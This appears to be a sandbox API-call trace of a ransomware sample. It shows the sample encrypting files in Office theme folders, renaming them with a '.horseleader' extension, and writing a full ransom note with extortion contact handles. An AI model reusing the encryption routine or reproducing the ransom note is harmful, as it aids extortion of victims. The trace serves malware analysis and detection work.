RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.151] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM.horseleader") returned 83 [0247.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.elm.horseleader")) returned 1 [0247.152] GetProcessHeap () returned 0x780000 [0247.152] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.153] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1ad, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ICE.INF", cAlternateFileName="")) returned 1 [0247.153] lstrcmpiW (lpString1="ICE.INF", lpString2="Windows") returned -1 [0247.153] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF") returned 71 [0247.153] StrStrIW (lpFirst="ICE.INF", lpSrch=".horseleader") returned 0x0 [0247.153] lstrcmpW (lpString1="ICE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.153] lstrcmpW (lpString1="ICE.INF", lpString2="_uninstalling_.png") returned 1 [0247.153] lstrlenW (lpString=".testttjffg") returned 11 [0247.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF", lpSrch=".testttjffg") returned 0x0 [0247.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.154] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF") returned 71 [0247.154] StrStrW (lpFirst="ICE.INF", lpSrch=".txt") returned 0x0 [0247.154] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=429) returned 1 [0247.154] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1ad, lpOverlapped=0x0) returned 1 [0247.155] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.156] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1ad, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1ad, lpOverlapped=0x0) returned 1 [0247.156] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.156] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.164] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.164] CloseHandle (hObject=0x1a4) returned 1 [0247.164] GetProcessHeap () returned 0x780000 [0247.164] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.164] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF.horseleader") returned 83 [0247.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf.horseleader")) returned 1 [0247.165] GetProcessHeap () returned 0x780000 [0247.165] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.165] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.166] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.166] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 75 [0247.166] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.166] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.166] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.166] lstrlenW (lpString=".testttjffg") returned 11 [0247.166] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.166] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.166] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.166] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.167] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 75 [0247.167] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.167] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2552) returned 1 [0247.167] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x9f8, lpOverlapped=0x0) returned 1 [0247.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff608, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x9f8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x9f8, lpOverlapped=0x0) returned 1 [0247.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.171] CloseHandle (hObject=0x1a4) returned 1 [0247.171] GetProcessHeap () returned 0x780000 [0247.172] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.172] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.horseleader") returned 87 [0247.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.horseleader")) returned 1 [0247.175] GetProcessHeap () returned 0x780000 [0247.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.176] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4981, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.176] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.176] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 76 [0247.176] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.176] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.176] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.176] lstrlenW (lpString=".testttjffg") returned 11 [0247.176] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.176] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.177] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 76 [0247.177] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.177] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18817) returned 1 [0247.177] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4981, lpOverlapped=0x0) returned 1 [0247.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb67f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4981, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4981, lpOverlapped=0x0) returned 1 [0247.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.179] CloseHandle (hObject=0x1a4) returned 1 [0247.179] GetProcessHeap () returned 0x780000 [0247.179] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.179] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.horseleader") returned 88 [0247.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.horseleader")) returned 1 [0247.180] GetProcessHeap () returned 0x780000 [0247.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.180] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4981, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.180] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.180] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\#Decrypt#.txt") returned 77 [0247.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.181] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.181] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.182] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.182] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.182] CloseHandle (hObject=0x158) returned 1 [0247.182] GetProcessHeap () returned 0x780000 [0247.182] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.183] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="INDUST", cAlternateFileName="")) returned 1 [0247.183] lstrcmpiW (lpString1="INDUST", lpString2="Windows") returned -1 [0247.183] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST") returned 66 [0247.183] lstrcmpW (lpString1="INDUST", lpString2=".") returned 1 [0247.183] lstrcmpW (lpString1="INDUST", lpString2="..") returned 1 [0247.183] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.183] GetProcessHeap () returned 0x780000 [0247.183] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.183] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*") returned 68 [0247.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.185] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\.") returned 68 [0247.186] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.186] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\..") returned 69 [0247.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4901300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x539538d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4901300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x184e9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="INDUST.ELM", cAlternateFileName="")) returned 1 [0247.186] lstrcmpiW (lpString1="INDUST.ELM", lpString2="Windows") returned -1 [0247.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM") returned 77 [0247.186] StrStrIW (lpFirst="INDUST.ELM", lpSrch=".horseleader") returned 0x0 [0247.186] lstrcmpW (lpString1="INDUST.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.186] lstrcmpW (lpString1="INDUST.ELM", lpString2="_uninstalling_.png") returned 1 [0247.186] lstrlenW (lpString=".testttjffg") returned 11 [0247.186] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM", lpSrch=".testttjffg") returned 0x0 [0247.186] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.186] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.186] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM") returned 77 [0247.187] StrStrW (lpFirst="INDUST.ELM", lpSrch=".txt") returned 0x0 